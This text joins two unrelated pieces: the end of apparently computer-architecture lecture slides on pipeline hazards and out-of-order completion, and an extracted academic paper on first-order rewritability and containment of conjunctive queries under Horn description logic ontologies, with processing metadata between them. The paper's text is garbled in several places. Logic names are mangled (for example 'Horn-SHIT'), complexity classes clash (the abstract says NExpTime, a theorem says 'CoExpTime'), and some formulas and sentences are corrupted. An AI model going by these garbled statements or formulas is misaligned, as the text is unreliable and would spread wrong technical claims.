<td>FP Multiply</td>
<td>6</td>
<td>1</td>
</tr>
<tr>
<td>FP Divide</td>
<td>24</td>
<td>24</td>
</tr>
</tbody>
</table>
Multicycle Example
<table>
<thead>
<tr>
<th>Instruction</th>
<th>IF</th>
<th>ID</th>
<th>EX</th>
<th>MEM</th>
<th>WB</th>
</tr>
</thead>
<tbody>
<tr>
<td>ADD R1, R2, R3</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>DIVD F2, F2, F3</td>
<td></td>
<td></td>
<td>E1</td>
<td>E2</td>
<td>E3</td>
</tr>
<tr>
<td>ADDD F10, F2,</td>
<td></td>
<td></td>
<td></td>
<td>-----</td>
<td></td>
</tr>
<tr>
<td>F8</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
---
Integer unit
FP/integer multiply
FP adder
FP/integer divider
MEM
WB
New Issues
- Structural Hazards on non-pipelined units
- Register writes per cycle can > 1 (what is the max?)
- WAW hazards are possible – are WAR?
- Instruction complete out of order (what is the problem?)
- Longer latency ops (what is the problem?)
Structural Hazards
- FP Divide not pipelined
- Too much hardware needed
- Register Write port contention
- Can fix through replicating hardware (multiported register file)
- Can fix through stalls in ID
- Track WB usage in ID with WB reservation bits (shift register)
- Simplest scheme (all hardware is in ID)
- Can fix through stalls when entering MEM or WB
- Less hardware, but multiple stall points
WAW Hazards
- Why weren’t they a problem before?
<table>
<thead>
<tr>
<th>MULD F0, F4, F6</th>
<th>IF</th>
<th>ID</th>
<th>M1</th>
<th>M2</th>
<th>M3</th>
<th>M4</th>
<th>M5</th>
<th>M6</th>
<th>M7</th>
<th>MEM</th>
<th>WB</th>
</tr>
</thead>
<tbody>
<tr>
<td>...</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>...</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>ADDD F0, F4, F6</td>
<td>IF</td>
<td>ID</td>
<td>A1</td>
<td>A2</td>
<td>A3</td>
<td>A4</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
- Are they a problem?
- Why generate 2 writes without an intervening read?
- Branch Delay slots, Instruction that trap conflict with trap handler
- Could happen, so we must check
WAW Hazard Logic
- **Solutions:**
- Stall younger instruction writeback
- Intuitive solution, fairly simple implementation
- Squash older instruction writeback
- Why not? The younger will overwrite it anyway…
- No stalling/performance loss
- What about precise exceptions?
Multicycle: Summary of Hazards
- Three more checks must be performed in ID
- Check for structural hazards
- Make sure functional unit (FU) is not busy
- Make sure Reg Write port is available
- Check for RAW data hazard
- Wait until sources are not a pending destination in any pipeline registers not available before instruction needs result
- Check for WAW data hazards
- Determine if any instruction in A1...A4, or M1...M7, or D has the same register destination as the instruction. If so stall!
- Concepts are the same, logic is more complicated
Multicycle: Out of Order Completion
• What could go wrong here?
DIVD F0, F2, F4
ADDD F10, F10, F8
SUBD F12, F12, F14
• Solutions
1. Ignore the problem (1960s, early 70s)
2. Buffer the results (with forwarding) until all earlier ops complete
– History files, Future Files (Can be combined with out-of-order issue)
3. Imprecise exception with enough info to allow trap-handlers to clean up
4. Hybrid: Allow issue to continue only if all older instructions have cleared their exception points
|
{"Source-Url": "http://www.eecs.harvard.edu:80/~dbrooks/cs246/cs246-lecture4.pdf", "len_cl100k_base": 9624, "olmocr-version": "0.1.53", "pdf-total-pages": 61, "total-fallback-pages": 0, "total-input-tokens": 85081, "total-output-tokens": 9664, "length": "2e13", "weborganizer": {"__label__adult": 0.0006012916564941406, "__label__art_design": 0.0011262893676757812, "__label__crime_law": 0.0005784034729003906, "__label__education_jobs": 0.00089263916015625, "__label__entertainment": 0.0001665353775024414, "__label__fashion_beauty": 0.0003523826599121094, "__label__finance_business": 0.0006561279296875, "__label__food_dining": 0.0006551742553710938, "__label__games": 0.002010345458984375, "__label__hardware": 0.055023193359375, "__label__health": 0.0006694793701171875, "__label__history": 0.0006551742553710938, "__label__home_hobbies": 0.0006275177001953125, "__label__industrial": 0.004306793212890625, "__label__literature": 0.0002951622009277344, "__label__politics": 0.0005955696105957031, "__label__religion": 0.000972270965576172, "__label__science_tech": 0.251953125, "__label__social_life": 8.45193862915039e-05, "__label__software": 0.01116180419921875, "__label__software_dev": 0.6640625, "__label__sports_fitness": 0.0009074211120605468, "__label__transportation": 0.001323699951171875, "__label__travel": 0.0003402233123779297}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 25389, 0.03176]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 25389, 0.13074]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 25389, 0.73773]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 368, false], [368, 458, null], [458, 809, null], [809, 833, null], [833, 1147, null], [1147, 1344, null], [1344, 1626, null], [1626, 1922, null], [1922, 2114, null], [2114, 2243, null], [2243, 2617, null], [2617, 2617, null], [2617, 3007, null], [3007, 3153, null], [3153, 3457, null], [3457, 3942, null], [3942, 4272, null], [4272, 4792, null], [4792, 5139, null], [5139, 5647, null], [5647, 5918, null], [5918, 6235, null], [6235, 6740, null], [6740, 7235, null], [7235, 7561, null], [7561, 7561, null], [7561, 8083, null], [8083, 9311, null], [9311, 9817, null], [9817, 10989, null], [10989, 11307, null], [11307, 11696, null], [11696, 12014, null], [12014, 12588, null], [12588, 12852, null], [12852, 13239, null], [13239, 14020, null], [14020, 14595, null], [14595, 15453, null], [15453, 15825, null], [15825, 16124, null], [16124, 16457, null], [16457, 16797, null], [16797, 17138, null], [17138, 17422, null], [17422, 17777, null], [17777, 19518, null], [19518, 20256, null], [20256, 20673, null], [20673, 21029, null], [21029, 21404, null], [21404, 21701, null], [21701, 22341, null], [22341, 22716, null], [22716, 22967, null], [22967, 23390, null], [23390, 24008, null], [24008, 24304, null], [24304, 24876, null], [24876, 25389, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 368, true], [368, 458, null], [458, 809, null], [809, 833, null], [833, 1147, null], [1147, 1344, null], [1344, 1626, null], [1626, 1922, null], [1922, 2114, null], [2114, 2243, null], [2243, 2617, null], [2617, 2617, null], [2617, 3007, null], [3007, 3153, null], [3153, 3457, null], [3457, 3942, null], [3942, 4272, null], [4272, 4792, null], [4792, 5139, null], [5139, 5647, null], [5647, 5918, null], [5918, 6235, null], [6235, 6740, null], [6740, 7235, null], [7235, 7561, null], [7561, 7561, null], [7561, 8083, null], [8083, 9311, null], [9311, 9817, null], [9817, 10989, null], [10989, 11307, null], [11307, 11696, null], [11696, 12014, null], [12014, 12588, null], [12588, 12852, null], [12852, 13239, null], [13239, 14020, null], [14020, 14595, null], [14595, 15453, null], [15453, 15825, null], [15825, 16124, null], [16124, 16457, null], [16457, 16797, null], [16797, 17138, null], [17138, 17422, null], [17422, 17777, null], [17777, 19518, null], [19518, 20256, null], [20256, 20673, null], [20673, 21029, null], [21029, 21404, null], [21404, 21701, null], [21701, 22341, null], [22341, 22716, null], [22716, 22967, null], [22967, 23390, null], [23390, 24008, null], [24008, 24304, null], [24304, 24876, null], [24876, 25389, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 25389, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 25389, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 25389, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 25389, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 25389, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 25389, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 25389, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 25389, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 25389, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 25389, null]], "pdf_page_numbers": [[0, 0, 1], [0, 368, 2], [368, 458, 3], [458, 809, 4], [809, 833, 5], [833, 1147, 6], [1147, 1344, 7], [1344, 1626, 8], [1626, 1922, 9], [1922, 2114, 10], [2114, 2243, 11], [2243, 2617, 12], [2617, 2617, 13], [2617, 3007, 14], [3007, 3153, 15], [3153, 3457, 16], [3457, 3942, 17], [3942, 4272, 18], [4272, 4792, 19], [4792, 5139, 20], [5139, 5647, 21], [5647, 5918, 22], [5918, 6235, 23], [6235, 6740, 24], [6740, 7235, 25], [7235, 7561, 26], [7561, 7561, 27], [7561, 8083, 28], [8083, 9311, 29], [9311, 9817, 30], [9817, 10989, 31], [10989, 11307, 32], [11307, 11696, 33], [11696, 12014, 34], [12014, 12588, 35], [12588, 12852, 36], [12852, 13239, 37], [13239, 14020, 38], [14020, 14595, 39], [14595, 15453, 40], [15453, 15825, 41], [15825, 16124, 42], [16124, 16457, 43], [16457, 16797, 44], [16797, 17138, 45], [17138, 17422, 46], [17422, 17777, 47], [17777, 19518, 48], [19518, 20256, 49], [20256, 20673, 50], [20673, 21029, 51], [21029, 21404, 52], [21404, 21701, 53], [21701, 22341, 54], [22341, 22716, 55], [22716, 22967, 56], [22967, 23390, 57], [23390, 24008, 58], [24008, 24304, 59], [24304, 24876, 60], [24876, 25389, 61]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 25389, 0.22165]]}
|
olmocr_science_pdfs
|
2024-12-09
|
2024-12-09
|
de45582fcd4c06fb7f34d7b8edd66d8aaeb94830
|
First Order-Rewritability and Containment of Conjunctive Queries in Horn Description Logics
Meghyn Bienvenu, Peter Hansen, Carsten Lutz, Frank Wolter
To cite this version:
HAL Id: lirmm-01367863
https://hal-lirmm.ccsd.cnrs.fr/lirmm-01367863
Submitted on 16 Sep 2016
HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers. L’archive ouverte pluridisciplinaire HAL, est destinée au dépôt et à la diffusion de documents scientifiques de niveau recherche, publiés ou non, émanant des établissements d’enseignement et de recherche français ou étrangers, des laboratoires publics ou privés.
First Order-Rewritability and Containment of Conjunctive Queries in Horn Description Logics
Meghyn Bienvenu
CNRS, Univ. Montpellier, Inria, France
meghyn@lirmm.fr
Peter Hansen and Carsten Lutz
University of Bremen, Germany
{hansen, clu}@informatik.uni-bremen.de
Frank Wolter
University of Liverpool, UK
frank@csc.liv.ac.uk
Abstract
We study FO-rewritability of conjunctive queries in the presence of ontologies formulated in a description logic between $\mathcal{EL}$ and Horn-$\mathcal{TIF}$, along with related query containment problems. Apart from providing characterizations, we establish complexity results ranging from $\text{EPTIME}$ via $\text{NEPTIME}$ to $2\text{EPTIME}$, pointing out several interesting effects. In particular, FO-rewriting is more complex for conjunctive queries than for atomic queries when inverse roles are present, but not otherwise.
1 Introduction
When ontologies are used to enrich incomplete and heterogeneous data with a semantics and with background knowledge [Calvanese et al., 2009; Kontchakov et al., 2013; Bienvenu and Ortiz, 2015], efficient query answering is a primary concern. Since classical database systems are unaware of ontologies and implementing new ontology-aware systems that can compete with these would be a huge effort, a main approach used today is query rewriting: the user query $q$ and the ontology $O$ are combined into a new query $q_O$ that produces the same answers as $q$ under $O$ (over all inputs) and can be handed over to a database system for execution. Popular target languages for the query $q_O$ include SQL and Datalog. In this paper, we concentrate on ontologies formulated in description logics (DLs) and on rewritability into SQL, which we equate with first-order logic (FO).
FO-rewritability in the context of query answering under DL ontologies was first studied in [Calvanese et al., 2007]. Since FO-rewritings are not guaranteed to exist when ontologies are formulated in traditional DLs, the authors introduce the DL-Lite family of DLs specifically for the purpose of ontology-aware query answering using SQL database systems; in fact, the expressive power of DL-Lite is seriously restricted, in this way enabling existence guarantees for FO-rewritings. While DL-Lite is a successful family of DLs, there are many applications that require DLs with greater expressive power. The potential non-existence of FO-rewritings in this case is not necessarily a problem in practical applications. In fact, ontologies emerging from such applications typically use the available expressive means in a harmless way in the sense that efficient reasoning is often possible despite high worst-case complexity.
One might thus hope that, in practice, FO-rewritings can often be constructed also beyond DL-Lite.
This hope was confirmed in [Bienvenu et al., 2013; Hansen et al., 2015], which consider the case where ontologies are formulated in a DL of the $\mathcal{EL}$ family [Baader et al., 2005] and queries are atomic queries (AQs) of the form $A(x)$. To describe the obtained results in more detail, let an ontology-mediated query (OMQ) be a triple $(T, \Sigma, q)$ with $T$ a description logic TBox (representing an ontology), $\Sigma$ an ABox signature (the set of concept and role names that can occur in the data), and $q$ an actual query. Note that $T$ and $q$ might use symbols that do not occur in $\Sigma$; in this way, the TBox enriches the vocabulary available for formulating $q$. We use $(\mathcal{L}, Q)$ to denote the OMQ language that consists of all OMQs where $T$ is formulated in the description logic $\mathcal{L}$ and $q$ in the query language $Q$. In [Bienvenu et al., 2013], FO-rewritability is characterized in terms of the existence of certain tree-shaped ABoxes, covering a range of OMQ languages between $(\mathcal{EL}, \mathcal{AQ})$ and (Horn-$\mathcal{TIF}, \mathcal{AQ}$). On the one hand, this characterization is used to clarify the complexity of deciding whether a given OMQ is FO-rewritable, which turns out to be $\text{EPTIME}$-complete. On the other hand, it provides the foundations for developing practically efficient and complete algorithms for computing FO-rewritings. The latter was explored further in [Hansen et al., 2015], where a novel type of algorithm for computing FO-rewritings of OMQs from $(\mathcal{EL}, \mathcal{AQ})$ is introduced, crucially relying on the previous results from [Bienvenu et al., 2013]. Its evaluation shows excellent performance and confirms the hope that, in practice, FO-rewritings almost always exist. In fact, rewriting fails in only 285 out of 10989 test cases.
A limitation of the discussed results is that they concern only AQs while in many applications, the more expressive conjunctive queries (CQs) are required. The aim of the current paper is thus to study FO-rewritability of OMQ languages based on CQs, considering ontology languages between $\mathcal{EL}$ and Horn-$\mathcal{TIF}$. In particular, we provide characterizations of FO-rewritability in the required OMQ languages that are inspired by those in [Bienvenu et al., 2013] (replacing tree-shaped ABoxes with a more general form of ABox), and we analyze the complexity of FO-rewritability using an automata-based approach. While practically efficient algorithms are out of the scope of this article, we believe that our work also lays important ground for the subsequent development of such
algorithms. Our approach actually does allow the construction of rewritings, but it is not tailored towards doing that in a practically efficient way. It turns out that the studied FO-rewritability problems are closely related to OMQ containment problems as considered in [Bienvenu et al., 2012; Bourhis and Lutz, 2016]. In fact, being able to decide OMQ containment allows us to concentrate on connected CQs when deciding FO-rewritability, which simplifies technicalities considerably. For this reason, we also study characterizations and the complexity of query containment in the OMQ languages considered.
Our main complexity results are that FO-rewritability and containment are \textsc{ExpTime}−complete for OMQ languages between \((\mathcal{EL}, \mathcal{AQ})\) and \((\mathcal{EL}(\mathcal{F}_n), \mathcal{CQ})\) and \textsc{2ExpTime}−complete for OMQ languages between \((\mathcal{EL}, \mathcal{CQ})\) and \((\mathcal{Horn-ShIF}, \mathcal{CQ})\). The lower bound for containment applies already when both OMQs share the same TBox. Replacing AQs with CQs thus results in an increase of complexity by one exponential in the presence of inverse roles (indicated by \(I\), but not otherwise. Note that the effect that inverse roles can increase the complexity of querying-related problems was known from expressive DLs of the \(\mathcal{ALC}\) family [Lutz, 2008], but it has not previously been observed for Horn-DLs such as \(\mathcal{EL}\) and Horn-\(\mathcal{SHIF}\). While \textsc{2ExpTime} might appear to be very high complexity, we are fortunately also able to show that the runtime is double exponential only in the size of the actual queries (which tends to be very small) while it is only single exponential in the size of the ontologies. We also show that the complexity drops to \textsc{NExpTime}−complete in the presence of inverse roles, which is transitivity assertions in CIs, an \(\mathcal{ELI}\) TBox is an \(\mathcal{ELI}(\mathcal{F}_n)\) TBox that contains neither transitivity assertions nor disjunctions in CIs, an \(\mathcal{ELI}\) TBox that contains neither functionality assertions nor RIs, and an \(\mathcal{ELI}(\mathcal{F}_n)\) TBox that does not contain inverse roles.
An ABox is a finite set of concept assertions \(A(a)\) and role assertions \(r(a, b)\) where \(A\) is a concept name, \(r\) a role name, and \(a, b\) individual names from a countably infinite set \(N_0\). We sometimes write \(r^{-1}(a, b)\) instead of \(r(b, a)\) and use \(\text{Ind}(A)\) to denote the set of all individual names used in \(A\). A signature is a set of concept and role names. We will often assume that the ABox is formulated in a prescribed signature, which we then call an ABox signature. An ABox that only uses concept and role names from a signature \(\Sigma\) is called a \(\Sigma\)-ABox.
The semantics of DLs is given in terms of interpretations \(I = (\Delta^I, \cdot^I)\), where \(\Delta^I\) is a non-empty set (the domain) and \(\cdot^I\) is the interpretation function, assigning to each \(A \in N_c\) a set \(A^I \subseteq \Delta^I\) and to each \(r \in N_r\) a relation \(r^I \subseteq \Delta^I \times \Delta^I\). The interpretation \(C^I \subseteq \Delta^I\) of a concept \(C\) in \(I\) is defined as usual, see [Baader et al., 2003]. An interpretation \(I\) satisfies a CI \(C \sqsubseteq D\) if \(C^I \subseteq D^I\), a functionality assertion \(\text{func}(r)\) if \(r^I\) is a partial function, a transitivity assertion \(\text{trans}(r)\) if \(r^I\) is transitive, an RI \(r \sqsubseteq s\) if \(r^I \subseteq s^I\), a concept assertion \(A(a)\) if \(a^I \in A^I\), and a role assertion \(r(a, b)\) if \((a^I, b^I) \in r^I\). We say that \(I\) is a model of a TBox or an ABox if it satisfies all inclusions and assertions in it. An ABox \(A\) is consistent with a TBox \(T\) if \(A\) and \(T\) have a common model. If \(\alpha\) is a CI, RI, or functionality assertion, we write \(T \models \alpha\) if all models of \(T\) satisfy \(\alpha\).
A conjunctive query (CQ) takes the form \(q = \exists x. \varphi(x, y)\) with \(x, y\) tuples of variables and \(\varphi\) a conjunction of atoms of
the form $A(x)$ and $r(x, y)$ that uses only variables from $x \cup y$. The variables in $y$ are called answer variables, the arity of $q$ is the length of $y$, and $q$ is Boolean if it has arity zero. An atomic query ($AQ$) is a conjunctive query of the form $A(x)$. A union of conjunctive queries ($UCQ$) is a disjunction of CQs that share the same answer variables. Ontology-mediated queries (OMQs) and the notation $(\mathcal{L}, Q)$ for OMQ languages were already defined in the introduction. We generally assume that if a role $r$ occurs in $q$ and $T \models s \subseteq r$, then trans$(s) \notin T$. This is common since allowing transitive roles in the query poses serious additional complications, which are outside the scope of this paper; see e.g. [Bienvenu et al., 2010; Gottlob et al., 2013].
Let $Q = (T, \Sigma, q)$ be an OMQ, $q$ of arity $n$, $A$ a $\Sigma$-ABox and $a \in \text{Ind}(A)^n$. We write $A \models Q(a)$ if $I \models q(a)$ for all models $I$ of $T$ and $A$. In this case, $a$ is a certain answer to $Q$ on $A$. We use $\text{cert}(Q, A)$ to denote the set of all certain answers to $Q$ on $A$.
A first-order query (FOQ) is a first-order formula $\varphi$ constructed from atoms $A(x), r(x, y)$, and $x = y$; here, concept names are viewed as unary predicates, role names as binary predicates, and predicates of other arity, function symbols, and constant symbols are not permitted. We write $\varphi(x)$ to indicate that the free variables of $\varphi$ are among $x$ and call $x$ the answer variables of $\varphi$. The number of answer variables is the arity of $\varphi$ and $\varphi$ is Boolean if it has arity zero. We use $\text{ans}(\mathcal{I}, \varphi)$ to denote the set of answers to the FOQ $\varphi$ on the interpretation $\mathcal{I}$; that is, if $\varphi$ is $n$-ary, then $\text{ans}(\mathcal{I}, \varphi)$ contains all tuples $d \in (\Delta^2)^n$ with $\mathcal{I} \models \varphi(d)$. To bridge the gap between certain answers and answers to FOQs, we sometimes view an ABox $A$ as an interpretation $\mathcal{I}_A$, defined in the obvious way.
For any syntactic object $O$ (such as a TBox, a query, an OMQ), we use $|O|$ to denote the size of $O$, that is, the number of symbols needed to write it (concept and role names counted as a single symbol).
**Definition 1** (FO-rewriting). An FOQ $\varphi$ is an FO-rewriting of an OMQ $Q = (T, \Sigma, q)$ if $\text{cert}(Q, A) = \text{ans}(\mathcal{I}_A, \varphi)$ for all $\Sigma$-ABoxes $A$ that are consistent with $T$. If there is such a $\varphi$, then $Q$ is FO-rewritable.
**Example 2.** (1) Let $Q_0 = (T_0, \Sigma_0, q_0(x, y))$, where $T_0 = \{ \exists r. A \sqsubseteq A, B \sqsubseteq \forall r. A \}$, $\Sigma_0 = \{ r, A, B \}$ and $q_0(x, y) = B(x) \wedge r(x, y) \wedge A(y)$. Then $\varphi_0(x, y) = B(x) \wedge r(x, y)$ is an FO-rewriting of $Q_0$.
We will see in Example 10 that the query $Q_A$ obtained from $Q_0$ by replacing $q_0(x, y)$ with the AQ $A(x)$ is not FO-rewritable (due to the unbounded propagation of $A$ via $r$-edges by $T_0$). Thus, an FO-rewritable OMQ can give raise to AQ `subqueries' that are not FO-rewritable.
(2) Let $Q_1 = (T_1, \Sigma_1, q_1(x))$, where $T_1 = \{ \exists r. \exists R. A \sqsubseteq \exists R. A, \Sigma_1 = \{ r, A \}$, and $q_1(x) = \exists y(r(x, y) \wedge A(y))$. Then $Q_1$ is not FO-rewritable (see again Example 10), but all AQ subqueries that $Q_1$ gives raise to are FO-rewritable.
The main reasoning problem studied in this paper is to decide whether a given OMQ $Q = (T, \Sigma, q)$ is FO-rewritable. We assume without loss of generality that every symbol in $\Sigma$ occurs in $T$ or in $q$. We obtain different versions of this problem by varying the OMQ language used. Note that we have defined FO-rewritability relative to ABoxes that are consistent with the TBox. It is thus important for the user to know whether that is the case. Therefore, we also consider FO-rewritability of ABox inconsistency. More precisely, we say that $ABox$ inconsistency is FO-rewritable relative to a TBox $T$ and $ABox$ signature $\Sigma$ if there is a Boolean FOQ $\varphi$ such that for every $\Sigma$-ABox $A, A$ is inconsistent with $T$ iff $I_A \models \varphi()$.
Apart from FO-rewritability questions, we will also study OMQ containment. Let $Q_1 = (T_1, \Sigma_1, q_1)$ be two OMQs over the same ABox signature. We say that $Q_1$ is contained in $Q_2$, in symbols $Q_1 \subseteq Q_2$, if $\text{cert}(Q_1, A) \subseteq \text{cert}(Q_2, A)$ holds for all $\Sigma$-ABoxes $A$ that are consistent with $T_1$ and $T_2$.
We now make two basic observations that we use in an essential way in the remaining paper. We first observe that it suffices to concentrate on $\mathcal{ELIHF}_1$ TBoxes $T$ in normal form, that is, all CIs are of one of the forms $A \sqsubseteq \bot, A \sqsubseteq \exists r.B, T \sqsubseteq A, B_1 \sqcap B_2 \sqsubseteq A, \exists r.B \sqsubseteq A$ with $A, B, B_1, B_2$ concept names and $r$ a role. We use $\text{sig}(T)$ to denote the concept and role names that occur in $T$.
**Proposition 3.** Given a Horn-$\mathcal{SH(\mathcal{L})}$ (resp. $\mathcal{ELIHF}_1$) TBox $T_1$ and ABox signature $\Sigma$, one can construct in polynomial time an $\mathcal{ELIHF}_1$ (resp. $\mathcal{ELIHF}_1$) TBox $T_2$ in normal form such that for every $\Sigma$-ABox $A$,
1. $A$ is consistent with $T_1$ iff $A$ is consistent with $T_2$;
2. if $A$ is consistent with $T_1$, then for any $CQ$ $q$ that does not use symbols from $\text{sig}(T_2) \setminus \text{sig}(T_1)$, we have $\text{cert}(Q_1, A) = \text{cert}(Q_2, A)$ where $Q_1 = (T_1, \Sigma, q)$.
Theorem 3 yields polytime reductions of FO-rewritability in (Horn-$\mathcal{SH(\mathcal{L})}$, $Q$) to FO-rewritability in ($\mathcal{ELIHF}_1, Q$) for any query language $Q$, and likewise for OMQ containment and FO-rewritability of ABox inconsistency. It also tells us that, when working with $\mathcal{ELIHF}_1$ TBoxes, we can assume normal form. Note that transitioning from (Horn-$\mathcal{SH(\mathcal{L})}$, $Q$) to ($\mathcal{ELIHF}_1, Q$) is not as easy as in the case with inverse roles since universal restrictions on the right-hand side of concept inclusions cannot easily be eliminated: for this reason, we do not consider (Horn-$\mathcal{SH(\mathcal{L})}$, $Q$). From now on, we work with TBoxes formulated in $\mathcal{ELIHF}_1$, or $\mathcal{ELIHF}_1$ and assume without further notice that they are in normal form.
Our second observation is that, when deciding FO-rewritability, we can restrict our attention to connected queries provided that we have a way of deciding containment (for potentially disconnected queries). We use conCQ to denote the class of all connected CQs.
**Theorem 4.** Let $L \in \{ \mathcal{ELIHF}_1, \mathcal{ELIHF}_1 \}$. Then FO-rewritability in $(\mathcal{L}, CQ)$ can be solved in polynomial time when there is access to oracles for containment in $(\mathcal{L}, Q)$ and for FO-rewritability in $(\mathcal{L}, \text{conCQ})$.
To prove Theorem 4, we observe that FO-rewritability of an OMQ $Q = (T, \Sigma, q)$ is equivalent to FO-rewritability of all OMQs $Q = (T, \Sigma, q_e)$ with $q_e$ a maximal connected component of $q$, excluding certain redundant such components (which can be identified using containment). Backed by Theorem 4, we generally assume connected queries when studying FO-rewritability, which allows to avoid unpleasant technical complications and is a main reason for studying FO-rewritability and containment in the same paper.
3 Main Results
In this section, we summarize the main results established in this paper. We start with the following theorem.
**Theorem 5.** FO-rewritability and containment are
1. 2ExpTime-complete for any OMQ language between (ELI, CQ) and (Horn-SHIT, CQ), and
2. ExpTime-complete for any OMQ language between (EL, AQ) and (ECHF, CQ).
Moreover, given an OMQ from (Horn-SHIT, CQ) that is FO-rewritable, one can effectively construct a UCQ-rewriting.
Like the subsequent results, Theorem 5 illustrates the strong relationship between FO-rewritability and containment. Note that inverse roles increase the complexity of both reasoning tasks. We stress that this increase takes place only when the actual queries are conjunctive queries, since FO-rewritability for OMQ languages with inverse roles and atomic queries is in ExpTime [Bienvenu et al., 2013].
The 2ExpTime-completeness result stated in Point 1 of Theorem 5 might look discouraging. However, the situation is not quite as bad as it seems. To show this, we state the upper bound underlying Point 1 of Theorem 5 a bit more carefully.
**Theorem 6.** Given OMQs $Q_i = (T_i, \Sigma_i, q_i), i \in \{1, 2\}$, from (Horn-SHIT, CQ), it can be decided
1. in time $2^{2^{q_1} q_2 + \log q_1 + \log q_2}$ whether $Q_1$ is FO-rewritable and
2. in time $2^{2^{q_1} q_2 + \log q_1 + \log q_2}$ whether $Q_1 \subseteq Q_2$, for some polynomial $p$.
Note that the runtime is double exponential only in the size of the actual queries $q_1$ and $q_2$, while it is only single exponential in the size of the TBoxes $T_1$ and $T_2$. This is good news since the size of $q_1$ and $q_2$ is typically very small compared to the sizes of $T_1$ and $T_2$. For this reason, it can even be reasonable to assume that the sizes of $q_1$ and $q_2$ are constant, in the same way in which the size of the query is assumed to be constant in data complexity. Note that, under this assumption, Theorem 6 yields ExpTime upper bounds.
One other way to relativize the seemingly very high complexity stated in Point 1 of Theorem 5 is to observe that the lower bound proofs require the actual query to be Boolean or disconnected. In practical applications, though, typical queries are connected and have at least one answer variable. We call such CQs rooted and use rCQ to denote the class of all rooted CQs. Our last main result states that, when we restrict our attention to rooted CQs, then the complexity drops to CoExpTime.
**Theorem 7.** FO-rewritability and containment are CoExpTime-complete in any OMQ language between (EL, rCQ) and (Horn-SHIT, rCQ).
4 Semantic Characterization
The upper bounds stated in Theorems 5 and 6 are established in two steps. We first give characterizations of FO-rewritability in terms of the existence of certain (almost) tree-shaped ABoxes, and then utilize this characterization to design decision procedures based on alternating tree automata. The semantic characterizations are of independent interest.
An ABox $A$ is tree-shaped if the undirected graph with nodes Ind$(A)$ and edges $\{(a, b) \mid r(a, b) \in A\}$ is acyclic and connected and $r(a, b) \in A$ implies that (i) $s(a, b) \notin A$ for all $s \neq r$ and (ii) $s(b, a) \notin A$ for all role names $s$. For tree-shaped ABoxes $A$, we often distinguish an individual used as the root, denoted with $\rho_A$. A is ditree-shaped if the directed graph with nodes Ind$(A)$ and edges $\{(a, b) \mid r(a, b) \in A\}$ is a tree and $r(a, b) \in A$ implies (i) and (ii). The (unique) root of a ditree-shaped ABox $A$ is also denoted with $\rho_A$.
An ABox $A$ is a pseudo tree if it is the union of ABoxes $A_0, \ldots, A_k$ that satisfy the following conditions:
1. $A_1, \ldots, A_k$ are tree-shaped;
2. $k \leq |\operatorname{Ind}(A_0)|$;
3. $A_i \cap A_0 = \{\rho_A\}$ and $\operatorname{Ind}(A_i) \cap \operatorname{Ind}(A_j) = \emptyset$, for $1 \leq i < j \leq k$.
We call $A_0$ the core of $A$ and $A_1, \ldots, A_k$ the trees of $A$. The width of $A$ is $|\operatorname{Ind}(A_0)|$, its depth is the depth of the deepest tree of $A$, and its outdegree is the maximum outdegree of the ABoxes $A_1, \ldots, A_k$. For a pseudo tree ABox $A$ and $\ell \geq 0$, we write $A|_{\leq \ell}$ to denote the restriction of $A$ to the individuals whose minimal distance from a core individual is at most $\ell$, and analogously for $A|_{> \ell}$. A pseudo ditree ABox is defined analogously to a pseudo tree ABox, except that $A_1, \ldots, A_k$ must be ditree-shaped.
When studying FO-rewritability and containment, we can restrict our attention to pseudo tree ABoxes, and even to pseudo ditree ABoxes when the TBox does not contain inverse roles. The following statement makes this precise for the case of containment. Its proof uses unraveling and compactness.
**Proposition 8.** Let $Q_i = (T_i, \Sigma_i, q_i), i \in \{1, 2\}$, be OMQs from (ELHF, CQ). Then $Q_1 \not\subseteq Q_2$ iff there is a pseudo tree $\Sigma$-ABox $A$ of outdegree at most $|T_1|$ and width at most $|q_1|$ that is consistent with both $T_1$ and $T_2$ and a tuple $a$ from the core of $A$ such that $A \models Q_1(a)$ and $A \not\models Q_2(a)$.
If $Q_1, Q_2$ are from (ELHF, CQ), then we can find a pseudo ditree ABox with these properties.
We now establish a first version of the announced characterizations of FO-rewritability. Like Proposition 8, they are based on pseudo tree ABoxes.
**Theorem 9.** Let $Q = (T, \Sigma, q)$ be an OMQ from (ELHF, conCQ). If the arity of $q$ is at least one, then the following conditions are equivalent:
1. $Q$ is FO-rewritable;
